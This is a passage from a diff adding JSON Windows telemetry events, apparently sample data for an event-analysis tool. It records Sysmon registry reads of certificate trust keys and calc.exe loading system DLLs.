"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": 
"Software Publishing", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": 
"CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245270000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ntmarta.dll", + "image_path": "C:\\Windows\\System32\\ntmarta.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573245270000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "Windows.UI.AppDefaults.dll", + "image_path": "C:\\Windows\\System32\\Windows.UI.AppDefaults.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245420000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 